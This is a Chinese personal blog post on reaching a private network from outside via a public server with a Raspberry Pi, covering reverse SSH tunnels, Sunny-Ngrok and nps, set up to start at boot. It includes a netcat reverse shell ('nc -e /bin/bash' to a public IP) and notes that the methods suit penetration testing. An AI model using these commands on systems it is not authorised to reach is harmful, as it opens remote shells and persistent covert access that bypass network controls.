树莓派,反向ssh,内网通过公网访问到其他内网
下面只是日常作者我自己用的内网穿透的方法,在渗透测试里面也可以使用
简单说
a内网,b公网,c内网
在c内网怎么访问到a的内网里面,就和访问c内网其他主机一样?
可以用花生壳内网穿透很简单。就不多说了
都是树莓派就不行了,如果进行,没有远程ssh就不行了,不能进行渗透测试
下面这几种方法只能算是临时的
开始操作
反向ssh隧道从内网就可以做到
内网执行的命令1
ssh -fN -R 5555:localhost:22 root@公网ip
服务器执行的命令
1
ssh root@localhost -p5555
nc反向反弹shell
服务器执行的命令
1
nc -lvnp 4455
内网执行的命令
1
nc -e /bin/bash 公网ip 4455
树莓派安装的是kali linux系统 安装花生壳树莓派,
花生壳地址https://hsk.oray.com/download/
应为树莓派我安装的arm64位的,他只有32位的,安装不上
下面命令对32位的支持
1 | dpkg --add-architecture armhf |
反正还是安装不是,不知道怎么回事![]()
树莓派用Sunny-Ngrok内网穿透
1 | ./sunny clientid 隧道id |
![]()
自启动http://www.ngrok.cc/官方说明
1、下载客户端
这一步就都不用说了大家都知道怎么操作。下载完成之后将客户端执行文件移动到 /use/local/bin 目录下并给予可执行权限。
1 | sudo mv sunny /usr/local/bin/sunny |
2、编写启动脚本
1 | sudo vim /etc/init.d/sunny 启动脚本代码 |
把代码里面的【隧道id】替换成自己的隧道id
1 | #!/bin/sh -e |
3、测试可执行代码
1 | sudo chmod 755 /etc/init.d/sunny |
4、设置开机启动
1 | cd /etc/init.d |
![]()
搭建nps内网穿透
安装
下载
1 | wget https://github.com/ehang-io/nps/releases/download/v0.26.8/linux_amd64_server.tar.gz |
解压
1 | tar -zxvf linux_amd64_server.tar.gz |
下载安装
1 | ./nps install |
启动
1 | ./nps start |
他把文件安装在/etc/nps/
他的配置文件在/etc/nps/conf/nps.conf
进入配置文件
1 | vi /etc/nps/conf/nps.conf |
![]()
![]()
配置完成后重启
1 | ./nps restart| |
登录web
阿里云添加规则![]()
访问![]()
添加客户端![]()
![]()
注意这个密钥下面会用到![]()
树莓派安装
下载
1 | wget https://github.com/ehang-io/nps/releases/download/v0.26.8/linux_arm64_client.tar.gz |
解压
1 | tar -zxvf linux_arm64_client.tar.gz |
解压出来会有一个npc文件连接nps服务器
1 | ./npc -server=阿里云的IP:客户端连接的端口 -vkey=密钥 |
连接成功![]()
配置隧道
已经连接上了![]()
添加隧道![]()
![]()
客户端ID在![]()
配置结果
可以看见可以访问了![]()
添加开机自启动
创建一个nps.sh文件文件内容
1 |
|
执行权限
1 | chmod 777 nps.sh |
添加启动
1 | vi /etc/xdg/autostart/nps.desktop |
1 | [Desktop Entry] |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 ZSSのW啥都学!





